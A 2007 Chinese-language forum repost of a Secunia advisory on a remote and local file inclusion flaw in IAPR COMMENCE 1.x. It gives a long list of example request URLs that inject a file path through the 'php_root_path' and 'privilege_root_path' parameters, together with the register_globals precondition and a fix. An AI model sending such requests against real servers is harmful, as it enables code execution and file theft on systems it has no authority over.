Board logo

标题: IAPR COMMENCE包含文件时的漏洞 [打印本页]
作者: pioneer     时间: 2007-11-28 09:53    标题: IAPR COMMENCE包含文件时的漏洞

来源

secunia.com

软件名

IAPR COMMENCE 1.x

描述

这可恶意危害有漏洞的系统
在多种脚本下输入的"php_root_path"和"privilege_root_path"参数在用户包含文件前没有被准确过滤,这可从本地和外部资源中包含任意文件

例子:
http://[host]/Commence/includes/db_connect.php?php_root_path=[file]
http://[host]/Commence/includes/include_all_fns.php?php_root_path=[file]
http://[host]/Commence/includes/main_fns.php?php_root_path=[file]
http://[host]/Commence/includes/output_fns.php?php_root_path=[file]
http://[host]/Commence/includes/user_authen_fns.php?php_root_path=[file]
http://[host]/Commence/admin/includes/include_all_fns.php?php_root_path=[file]
http://[host]/Commence/admin/phase/include_all_phase.php?php_root_path=[file]
http://[host]/Commence/admin/phase/phase1.php?php_root_path=[file]
http://[host]/Commence/admin/phase/phase1.php?privilege_root_path=[file]
http://[host]/Commence/admin/phase/phase2.php?php_root_path=[file]
http://[host]/Commence/admin/phase/phase2.php?privilege_root_path=[file]
http://[host]/Commence/admin/phase/phase3.php?php_root_path=[file]
http://[host]/Commence/admin/phase/phase3.php?privilege_root_path=[file]
http://[host]/Commence/admin/phase/phase4.php?php_root_path=[file]
http://[host]/Commence/admin/phase/phase4.php?privilege_root_path=[file]
http://[host]/Commence/admin/phase/phasebase.php?php_root_path=[file]
http://[host]/Commence/includes/page_includes/page.php?php_root_path=[file]
http://[host]/Commence/includes/page_includes/pagebase.php?php_root_path=[file]
http://[host]/Commence/reviewer/includes/include_all_fns.php?php_root_path=[file]
http://[host]/Commence/reviewer/phase/include_all_phase.php?php_root_path=[file]
http://[host]/Commence/includes/page_includes/pagebase.php?php_root_path=[file]  
http://[host]/Commence/reviewer/phase/phase1.php?php_root_path=[file]   
http://[host]/Commence/reviewer/phase/phase1.php?privilege_root_path=[file]  
http://[host]/Commence/reviewer/phase/phase2.php?php_root_path=[file]   
http://[host]/Commence/reviewer/phase/phase2.php?privilege_root_path=[file]  
http://[host]/Commence/reviewer/phase/phase3.php?php_root_path=[file]   
http://[host]/Commence/reviewer/phase/phase3.php?privilege_root_path=[file]  
http://[host]/Commence/reviewer/phase/phase4.php?php_root_path=[file]   
http://[host]/Commence/reviewer/phase/phase4.php?privilege_root_path=[file]  
http://[host]/Commence/reviewer/phase/phasebase.php?php_root_path=[file]
http://[host]/Commence/user/phase/include_all_phase.php?php_root_path=[file]
http://[host]/Commence/user/phase/phase1.php?php_root_path=[file]   
http://[host]/Commence/user/phase/phase2.php?php_root_path=[file]   
http://[host]/Commence/user/phase/phase3.php?php_root_path=[file]   
http://[host]/Commence/user/phase/phase4.php?php_root_path=[file]   
http://[host]/Commence/user/phase/phasebase.php?php_root_path=[file]

成功利用需要"register_globals"可用
该漏洞在version 1.3中已经确认,其它版本可能也受到影响

解决方案

编辑源代码确保充分过滤
设置"register_globals"为"Off"

[ Last edited by pioneer on 2007-11-28 at 14:17 ]



欢迎光临 微点交流论坛 (http://bbs.micropoint.com.cn/) bbs.micropoint.com.cn